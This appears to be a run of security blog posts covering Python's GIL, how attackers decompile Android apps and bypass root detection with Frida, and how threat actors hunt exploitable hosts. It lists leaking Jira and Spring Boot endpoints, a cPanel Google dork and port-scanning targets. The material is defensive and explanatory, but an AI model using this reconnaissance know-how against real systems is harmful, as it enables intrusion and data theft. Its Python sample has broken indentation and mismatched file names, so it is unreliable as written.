'Url': 'https://r2---sn-gwpa-h55k.googlevideo.com/videoplayback?expire=1585225812&ei=9Et8Xs6XNoHK4-EPjfyIiA8&ip=157.46.68.124&id=o-AGeDi3DVtAbmT5GiuGsDU7-NPLk23fOXNnY16gGQcHWu&itag=251&source=youtube&requiressl=yes&mh=Av&mm=31%2C26&mn=sn-gwpa-h55k%2Csn-cvh76ned&ms=au%2Conr&mv=m&mvi=1&pl=18&initcwndbps=112500&vprv=1&mime=audio%2Fwebm&gir=yes&clen=14933951&dur=986.761&lmt=1576518368612802&mt=1585204109&fvip=2&keepalive=yes&fexp=23882514&c=WEB&txp=5531432&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cgir%2Cclen%2Cdur%2Clmt&sig=ADKhkGMwRAIgK4L4VVHAlWMPVPEcmdkhnb2u8UM6eYhFz16kGruxZjUCIFXZJM9ejVK7OZJFqx7YwBqa3CrDvVakuU86vcIyMv-a&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=ABSNjpQwRAIgKBhJytjv73-c7eMWbVkb-X8_rNb7_xApZvaPfw7wGcMCIHqJ405fQ3Kr-e_5fV8gokMUNi0rrrLG8T85sLGTQ17W'
}]

What is ITag?

ITag gives us more details about the video such as the type of video content, resolution, bitrate, range and VR/3D. A comprehensive list of YouTube format code ITags can be found here.

How do CloudSEK Crawlers work?

 

cloudsek crawlers

 

CloudSEK’s digital risk monitoring platform, XVigil, scours the internet across surface web, dark web, and deep web, to automatically detect threats and alert customers. After configuring a list of keywords suggested by the clients, CloudSEK Crawlers:

  1. Fetch data from various sources on the internet
  2. Push the gathered data to a centralized queue
  3. ML Classifiers group the data into threats and non-threats
  4. Threats are immediately reported to clients as alerts, via XVigil. Non-threats are simply ignored.

How do you achieve concurrency with Python threads?

Introduction

The process of threading allows the execution of multiple instructions of a program, at once. Only multi-threaded programming languages like Python support this technique. Several I/O operations running consecutively decelerates the program. So,  the process of threading helps to achieve concurrency.

In this article, we will explore:

  1. Types of concurrency in Python
  2. Global Interpreter Lock
  3. Need for Global Interpreter Lock
  4. Thread execution model in Python 2
  5. Global Interpreter Lock in Python 3

Types of Concurrency In Python

In general, concurrency is the parallel execution of different units of a program, which helps optimize and speed up the overall process. In Python, there are 3 methods to achieve concurrency:

  1. Multi-Threading
  2. Asyncio
  3. Multi-processing

We will be discussing the fundamentals of thread-execution model. Before going into the concepts directly, we shall first discuss Python’s Global Interpreter Lock (GIL).

Global Interpreter Lock

Python threads are real system threads (POSIX threads). The host operating system fully manages the POSIX threads, also known as p-threads.

In multi-core operating systems, the Global Interpreter Lock (GIL) prevents the parallel execution of p-threads of a multi-threaded Python process. Thus, ensuring that only one thread runs in the interpreter, at any given time.

Why do we need Global Interpreter Lock?

GIL helps to simplify, the implementation of the interpreter, and memory management. To understand how GIL does this, we need to understand reference counting.

For example: In the code below, ‘b’ is not a new list. It is just a reference to the previous list ‘a.’

>>> a = []
>>> b = a
>>> b.append(1)
>>> a
[1]
>>> a.append(2)
>>> b
[1,2]

 

Python uses reference counting variables to track the number of references that point to an object. The memory occupied by the object is released if the value of the reference counting variable is zero. If threads, of a process sharing the same memory, try to access this variable to increment and decrement simultaneously, it can cause leaked memory that is never released, or releasing the memory incorrectly. And this leads to crashes.

One solution is to have a lock for the reference counting variable object memory by using semaphores so that it is not modified simultaneously. However, adding locks to all objects increases the performance overhead in the acquisition and release of locks. Hence, Python has a GIL which gives access to all resources of a process to only one thread at one time. Apart from GIL there are other solutions, such as garbage collection used in JPython interpreter, for memory management.

So, the primary outcome of GIL is, instead of parallel computing you get pre-emptive (threading) and co-operative multitasking (asyncio).

Thread Execution Model in Python 2

 

#sek.py #par.py
import time
def countdown(n):
     while n > 0:
     n -= 1
count = 50000000
start = time.time()
countdown(count)
end = time.time()
print('Time taken in seconds -', end-start)

 

import time
from threading import Thread
COUNT = 50000000
def countdown(n):
     while n>0:
     n -= 1
t1 = Thread(target=countdown, args=(COUNT//2,))
t2 = Thread(target=countdown, args=(COUNT//2,))
​start = time.time()
t1.start()
t2.start()
t1.join()
t2.join()
end = time.time()
​print('Time taken in seconds -', end - start)

 

~/Pythonpractice/blog❯ python seq.py
(‘Time taken in seconds -‘, 1.2412900924682617)
~/Pythonpractice/blog❯ python par.py
(‘Time taken in seconds -‘, 1.8751227855682373)

Ideally, the par.py execution time should be half of the seq.py execution time. However, in the above example we can see that the par.py execution time is slightly higher than that of seq.py. To understand the reduction in performance, despite the sharing the work between two threads which run in parallel, we need to first discuss CPU-bound and I/O-bound threads.

CPU-bound threads are threads performing CPU intense operations such as matrix multiplication or nested loop operations. Here, the speed of program execution depends on CPU performance.

 

 

I/O-bound threads are threads performing I/O operations such as listening to a socket or waiting for a network connection. Here, the speed of program execution depends on factors including external file systems and network connections.

 

Scenarios in a Python multi-threaded program

When all threads are I/O-bound

If a thread is running, it holds the GIL. When the thread hits the I/O operation, it releases the GIL, and another thread acquires it to get executed. This alternate execution of threads is called multi-tasking.

 

 

Where one thread is CPU bound, and another thread is IO-bound:

A CPU bound thread is a unique case in thread execution. A CPU bound thread releases the GIL after every few ticks and tries to acquire again. A tick is a machine instruction. When releasing the GIL, it also signals the next thread in the execution queue (ready queue of the operating system) that the GIL has been released. Now, these CPU-bound and I/O-bound threads are in a race to acquire the GIL. The operating system decides which thread needs to be executed. This model of executing the next thread in the execution queue, before completing the previous thread, is called pre-emptive multitasking.

 

 

 

In most of the cases, operating system gives preference to the CPU bound thread and allows it to reacquire the GIL, leaving the I/O-bound thread starving. In the below diagram, the CPU-bound thread has released GIL and signaled thread 2. But even before thread 2 tries to acquire GIL, the CPU-bound thread has reacquired the GIL.  This issue has been resolved in Python 3 interpreter’s GIL.

 

 

In a single core operating system, if the CPU bound thread reacquires GIL, it pushes back the second thread to the ready queue, assigning it some priority. This is because Python doesn’t have control over the priorities assigned by the operating system.

In a multicore operating system, if the CPU bound thread reacquires the GIL then it does not push back the second thread, but continuously tries to acquire the GIL using another core. This characterizes thrashing. Thrashing reduces the performance if many threads try to acquire the GIL, using different cores of the operating system. Python 3 also addresses the issue of thrashing.

 

 

Global Interpreter Lock in Python 3

The Python 3 threat execution model has a new GIL. If there is only one thread running, it continues to run, until it hits an I/O operation or other thread requests, to drop the GIL. A global variable (gil_drop_request) helps to implement this.

If gil_drop_request = 0, running thread can continue until it hits I/O

If gil_drop_request = 1, running thread is forced to give up the GIL

Instead of CPU-bound thread check after every few ticks, the second thread is sending a GIL drop request by setting the variable gil_drop_request = 1 after reaching a timeout. The first thread will then immediately drop the GIL. Additionally, to suspend the first thread’s execution, the second thread sends a signal. This helps to avoid thrashing. This check is not available in Python 2.

 

 

Missing Bits in the New GIL

While the new GIL does address issue such as thrashing, it still has some areas of improvement:

Waiting for time out

Waiting for timeout can make the I/O response slow. Especially, when there are multiple, recurrent I/O operations. I/O-bound Python programs take considerable time to add a GIL, followed by a time out. This happens after every I/O operation, and before the next input/output is ready.

Unfair GIL acquiring

As seen below, the thread that makes the GIL drop request is not the one that gets the GIL. This type of situation can reduce the performance of I/O, where response time is critical.

 

 

Prioritizing threads

There is a need for the GIL to distinguish between CPU-bound and I/O-bound threads and then assign priorities. High priority threads must be able to immediately preempt low priority threads. This will help improve the response time considerably.  This issue has already been resolved in operating systems. Operating systems use timeout to automatically adjust task priorities. If a thread is preempted by a timeout, it is penalized with a low priority. Conversely, if a thread suspends early, it is rewarded with raised priority. Incorporating this in Python will help improve thread performance.

 

Why attackers can't resist Android apps

Why attackers can’t resist Android applications

In their quest for new attack surfaces, threat actors find easy targets among the ~2.7 million Android applications, ad infinitum.

What makes Android applications irresistible targets? 

  1. The ease with which an attacker can acquire the entire source code of an Android application.
  2. The source codes often contain API keys, secret tokens, sensitive credentials, and endpoints, which developers forget to remove after staging.

Developers often lack awareness about attack vectors on a mobile app. Owing to a false sense of security, provided by the sandboxed and permission-oriented operating systems. However, mobile apps have the same attack vectors as web apps, albeit with different exploitation techniques. 

When an attacker meets an Android app

After getting their hands on an Android app’s source code, attackers first decompile it, analyse it for weaknesses, and then exploit it.

Decompiling the source code

The attacker first extracts files and folders from the apk file of an Android app, which is similar to unzipping a zip file. However, the files are compiled. To read the source code, the files are decompiled using:     

  • Apktool: To read the AndroidManifest.xml file. It also disassembles to small code and allows to repack the apk after modifications.
  • Dex2jar: To convert the Dex file into a Jar file.
  • Jadx/Jd-gui: To read the code in GUI format.

Analysing the source code

The attacker analyses the source code using 2 methods: 

  • Static Analysis
  • Dynamic Analysis

Static Analysis

In this approach, the attacker examines the source code for secret tokens, API keys, credentials, and secret paths. They also understand the source code, check for activities, content providers, broadcast receivers, vulnerable permissions, local storage, sensitive files, etc.

Here are some examples of what attackers look for during static analysis:

Sensitive Information 

As we can see, the strings.xml file below exposes sensitive information such as API keys, bucket name, Firebase database URL, etc.

strings.xml file exposes sensitive information about the Android app
strings.xml file exposes sensitive information
Working Credentials

Often, usernames and passwords are hidden in the source code, because developers forget to remove them. 

Exposed passwords make the Android app vulnerable
Exposed passwords
Content Providers

Content Providers allow applications to access data from other applications. And in order to access a Content Provider, you need its URI. 

Attackers check if the Content Provider attribute is ‘exported=true,’ which implies that it can be accessed by third-party applications.

The Content Provider attribute is ‘exported=true'
The Content Provider attribute is ‘exported=true’
Content Provider URI
Content Provider URI

Below we are accessing the content provider declared by the vulnerable application through the tool i.e. content, which acts as a third-party application.

Using the Content Provider to access data without a PIN
Using the Content Provider to access data without a PIN
Activities

An activity implements a screen/window in an app. So, an app usually invokes only an activity i.e. a particular screen in another app, and not the app as a whole.  

Attackers check for weaknesses in activities in the AndroindManifest.xml file. Where, if an activity is marked as ‘exported=true,’ a third-party app can initiate that activity.

Activity marked as 'exported=true'
Activity marked as ‘exported=true’

For example, the screen below has a functionality to submit a password. And only on submitting the password, we can see the dashboard. 

Password required to view dashboard
Password required to view dashboard

However, if the activity responsible for showing the dashboard is marked ‘exported= true,’ an attacker can use an Activity Manager (AM) tool to run it. 

Using an Activity Manager to run the activity
Using an Activity Manager to run the activity

And by doing this the attacker can access the dashboard without a password. 

Accessing the dashboard without a password
Accessing the dashboard without a password
Broadcast Receivers

Broadcast receivers listen for system-generated or custom generated events from other applications or from the system itself. 

Attackers check for weaknesses in Broadcast Receivers in the AndroindManifest.xml file. And if the intent-filter tag is declared ‘exported=true,’ a third-party application can easily access it. To prevent this, we need to explicitly declare ‘exported=false.’

Intent-filter tag declared ‘exported=true’
Intent-filter tag declared ‘exported=true’

After checking for the parameters that the receiver can accept, attackers can write a command that will trigger the receiver on behalf of the application.  

For example: The following command triggers the receiver to send a message to a phone number. 

Command to trigger the receiver
Command to trigger the receiver

Following which, the message is delivered to the phone number:

Message sent as per command
Message sent as per command

Dynamic analysis

In this approach, the attacker uses a binary toolkit such a Frida to hook to a targeted application and change its implementation. It also allows the attacker to bypass root detection and SSLs. 

Since Frida has the capability to access classes and functions of a targeted process/ application, the attacker injects their own JavaScript (JS) payload at runtime, to analyze the behavior of the code. 

Bypassing root detection

The following application has root detection. Hence, to access all the capabilities of the application, the attackers need to bypass root detection. 

A device that has root detection
A device that has root detection

First, the attacker needs to identify the function that is responsible for root detection. Which they can get from the source code:

Root detection function in the source code
Root detection function in the source code

If one of the functions i.e. ‘doesSuperuserApkExist(‘’) and doesSuExist(‘’)’ returns True, it will be identified as a Rooted Device.

So, the attacker needs to change the implementation of these two functions to False, in order to bypass the rooting. And this is where Frida comes to use. 

By injecting the following JS payload, the attacker changes the implementation of the functions responsible for root detection. 

JS payload to change the root detection function
JS payload to change the root detection function

With the help of use(), the attacker accesses the PostLogin class. Here, they mention the function i.e. ‘doesSUexist or doesSuperuserApkExist,’ that they need to hook. After which, the function will start returning False instead of True

Frida Client then sends the server this JS payload. And the server makes it a thread and sends it to the JS Engine. So, whenever the application calls this function, Frida will call the thread instead of the actual function declared in source code.

"<yoastmark

Conclusion

Given the increasing sophistication of cyber-attacks, it is important that Android apps undergo proper vulnerability assessments before publishing. Also, developers should not leave sensitive information such as API keys and credentials exposed in the source code. 

How do threat actors discover and exploit vulnerabilities in the wild?

 

In the recent past, several security vulnerabilities have been discovered, in widely used software products. Since these products are installed on a significant number of devices, connected to the internet, it entices threat actors to develop botnets, steal sensitive data, and more.

In this article we explore:

  • Vulnerabilities detected in some popular products.
  • Target identification and exploitation techniques employed by intrusive threat actors.
  • Threat actors’ course of action in the event of identifying a flaw in widely used internet products/technology.

 

Popular Target Vulnerabilities and their Exploitation

 Ghostcat: Apache Tomcat Vulnerability

All Apache Tomcat Server versions are vulnerable to Local File Inclusion and Potential RCE. The issue resides in the AJP protocol, which is an optimised version of the HTTP protocol. The years old vulnerability is vulnerable because of the component which handled a request attribute improperly. The AJP protocol, enabled by default, listens on TCP port 8009. Multiple scanners, exploit scripts, honeypots surfaced in a matter of days after the original disclosure by Apache.

Stats published by researchers indicate a large number of affected systems, the numbers being much greater than originally predicted.

Twitter post on the number of hosts that have vulnerabilities
Twitter post on the number of affected hosts

Citrix ADC, Citrix Gateway RCE, Directory Traversal

Recently, Directory Traversal and RCE vulnerabilities, in Citrix ADC and Gateway products, affected at least 80,000 systems. Shortly after the disclosure, multiple entities (ProjectZeroIndia, TrustedSec) released PoC scripts publicly that engendered a slew of exploit attempts, from multiple actors in the wild.

Stats on honeypot detects per hour on expose vulnerabilities
Stats on honeypot detects: https://twitter.com/sans_isc/status/1216022602436808704

Jira Sensitive Data Exposure

 A few months ago, researchers found Jira Instances leaking sensitive information such as names, roles, email IDs of employees. Additionally, internal project details, such as milestones, current projects, owner and subscriber details, etc., were also accessible to anyone making a request to the following unauthenticated JIRA endpoints:

 

https://jirahost/secure/popups/UserPickerBrowser.jspa

https://jirahost/secure/ManageFilters.jspa?filterView=popular

https://jirahost/secure/ConfigurePortalPages!default.jspa?view=popular

Companies affected due to Jira vulnerabilities
Companies affected due to the Jira vulnerability

Avinash Jain, from Grofers, tested the vulnerability on multiple targets, and discovered a large number of vulnerable Jira instances, revealing sensitive data belonging to various companies, such as NASA, Google and Yahoo, and its employees.

 Spring Boot Data Leakage via Actuators

Spring Boot is an open source Java-based MVC framework. It enables developers to quickly set up routes to serve data over HTTP. Most apps using the Spring MVC framework now also use the Boot utility. Boot helps developers to configure what components to add, and also to setup the Framework faster.

An added feature of the tool called Actuator, enables developers to monitor and manage their applications/REST API, by storing and serving request dumps, metrics, audit details, and environment settings.

In the event of a misconfiguration, these Actuators could be a back door to the servers, making exposed applications susceptible to breaches. The misconfiguration in Spring Boot Versions 1 to 1.4 granted access to Actuator endpoints without authentication. Although later versions secure these endpoints by default, and allow access only after authentication, developers still tend to ignore the misconfiguration before deploying the application.

The following actuator endpoints leak sensitive data:

/dump performs a thread dump and returns the dump
/trace returns the dump of HTTP requests received by the app
/logfile returns the app-logged content
/shutdown commands the app to shutdown gracefully
/mappings returns a list of all the @RequestMapping paths
/env exposes all the Spring’s ConfigurableEnvironment values
/health returns application’s health information

 

There are other such defective Actuator endpoints, that provide sensitive information to:

  • Gain system information
  • Send requests as authenticated users (by leveraging session values obtained from the request dumps)
  • Execute critical commands, etc.

Webmin RCE via backdoored functionality

Webmin is a popular web-based system configuration tool. A zero-day pre-auth RCE vulnerability, affects some of its versions, between 1.882 and 1.921. This vulnerability enables the remote password change functionality. The Webmin code repository on SourceForge was backdoored with malicious code allowing remote command execution (RCE) capability on an affected endpoint.

The attacker sends his commands piped with Password Change parameters through `password_change.cgi` on the vulnerable host running Webmin. And if the Webmin app is hosted with root privileges, the adversary can execute malicious commands as an administrator.

Command execution payload
Command execution payload

Why do threat actors exploit vulnerabilities?

  1. Breach user/company data: Data exfiltration of Sensitive/PII data
  2. Computing power: Infecting systems to mine Cryptocurrency, serve malicious files
  3. Botnets, serving malicious files: Exploits targeted at adding more bots to a larger botnet
  4. Service disruption and eventually Ransom: Locking users out of the devices
  5. Political reasons, cyber war, angry user, etc.

 

How do adversaries exploit vulnerabilities?

On disclosure of such vulnerabilities, adversaries probe the internet for technical details and exploit codes, to launch attacks. Rand corporation’s research and analysis on zero-day vulnerabilities states that, after a vulnerability disclosure, it takes 6 to 37  days and a median of 22 days to develop a fully functional exploit. But when an exploit disclosure comes with a patch, developers and administrators immediately patch the vulnerable software. Auto update, regular security updates, large scale coverage of such disclosures help to contain attacks. However, several systems run the unpatched versions of a software or application and become easy targets for such attacks.

Steps involved in vulnerability exploitation

Once a bad actor decides to exploit a vulnerability they have to:

  • Obtain a working exploit or develop an exploit (in case of a zero-day vulnerability)
  • Utilize Proof of Concept (PoC) attached to a bug report (in case of a bug disclosure)
  • Identify as many hosts as possible that are vulnerable to the exploit
  • Maximise the number of targets to maximise profits.

Target Hunting

Even though the respective vendors patch vulnerabilities reported, upon searching GitHub or specific CVEs on ExploitDB, we can find PoC scripts for the issues. Usually PoC scripts require a host/ URL as an input and it measures the success of the exploit/ examination.

Adversaries identify a vulnerable host through their signatures/ behaviour, to generate a list of exploitable hosts. The following components possess signatures that determine whether a host is vulnerable or not:

  • Port
  • Path
  • Subdomain
  • Indexed Content/ URL

Port

Many commonly used software has a specific default installation port(s). If a port is not configured, the software installs on a pre-set port. And in most cases a software installs on the default port. For example, most systems use default port 3306 to install MySQL and port 9200 for Elasticsearch. So, by curating a list of all servers with an open 9200 port, a threat actor can determine systems running the Elasticsearch. However, port 9200 can be used to install other services/ software as well.

Using port scans to discover targets to exploit the Webmin RCE vulnerabilities

  • Determining that the default port where Webmin listens to after installation is Port 10000.
  • Get a working PoC for the Webmin exploit.
  • Execute a port scan on all hosts connected to the internet for port 10000.
  • This will lead to a discovery of all possible Webmin installations that could be vulnerable to the exploit.

In addition, tools like Shodan make port-based target discovery effortless. At the same time, if Shodan does not index the target port, attackers leverage tools like MassScan, Zenmap and run an internet-wide scan. The latter approach hardly takes a day if the attacker has enough resources.

Similarly, an attacker in search of an easy way to find a list of systems affected by Ghostcat, will port scan all the target IPs and narrow down on machines with port 8009 open.

Path

Software/ services are commonly installed on a distinct default path. Thus, the software can be fingerprinted by observing the signature path. For instance, WordPress installations can be identified if the path ‘wp-login.php’ is detected on the server. This facilitates locating the service as it accesses a web browser.

For example, when phpmyadmin utility is installed, by default it installs on the path ‘/phpmyadmin’. A user can access the utility through this path. In this case, a port scan won’t help, because this utility doesn’t install on a specific port.

Using distinct paths to discover targets to exploit Spring Boot Data Leakage

  • Gather a list of hosts that run Spring Boot. Since the default Spring Boot applications start on port 8080, it would help to have a list of hosts that have this port open. This allows threat actors to see a pattern.
  • Hit specific endpoints like ‘/trace’, ‘/env’ on the hosts and check the response for sensitive content.

Web path scanners and web fuzzer tools such as Dirsearch or Ffuf facilitate this process.

Though responses may include false positives, actors can use techniques, such as signature matching or static rule check, to constrict the list of vulnerable hosts. As this method operates with HTTP requests and responses, the process can be much slower than mass scale port scans. Shodan can also fetch hosts based on http responses, from its index.

Subdomain

Software are commonly installed on a specific subdomain since is an easier, standard, and convenient way to operate the software.

For example, Jira is commonly found on a subdomain as in ‘jira.domain.com’ or ‘bug-jira.domain.com’. Even though there are no rules when it comes to subdomains, adversaries can identify certain patterns. Similar services, usually installed on a subdomain, are Gitlab, Ftp, Webmail, Redmine, Jenkins, etc.

Security Trails, Circl.lu, Rapid7 Open Data hold passive DNS records. Other scanners that maintain such records would be sites such as Crt.sh and Censys. They collect SSL certificate records regularly and have an add-on feature that supports queries.

Indexed Content/Url

The content published by services is generally unique. If we employ search engines such as Google, to find pages based on particular signatures, serving specific content, the results will have a list of URLs running a particular service. This is one of the most common techniques to hunt down targets, easily.
It is commonly known as ‘Google Dorking’. For instance, adversaries can quickly curate a short list of all cPanel login pages. For which, they could use the following Dork in Google Search: “site:cpanel.*.* intitle:”login” -site:forums.cpanel.net”. The Google Hacking database contains numerous such Dorks and after understanding the search mechanism, it is easy to write such search queries.

Observations

There have been multiple honey pot experiments to study the mass scale exploration and exploitation in the wild. Setting up honey pots is not only a good way of understanding the attack patterns, it also serves in identifying malicious actors out there, trying to exploit systems in the wild. These identified IPs/ Network trying to enumerate targets or exploit vulnerable systems end up in various public blacklists. Various research attempts have set up diverse honeypots and studied the techniques used to gain access. Most attempts are to gain access via default credentials, and originated mainly from blacklisted IP addresses.

Another interesting observation is that, most honeypot detected traffic, seems to originate from China. It is also very common to see honeypots specific to a zero-day surface on Github as soon after a the release of an exploit. The Citrix ADC vulnerability (CVE-2019-19781) also saw a few honeypots being published on Github within a short time after the first exploit PoC was released.

Research carried out by Sophos highlights the high rate of activity on exposed targets using honeypots. As reported in the research paper, it took from less than a minute to 2 hours for the first attack on the exposed target. Therefore, if an accidental misconfiguration leaves a system exposed to the internet, for even a short period of time, it should not be assumed that the system was not exploited.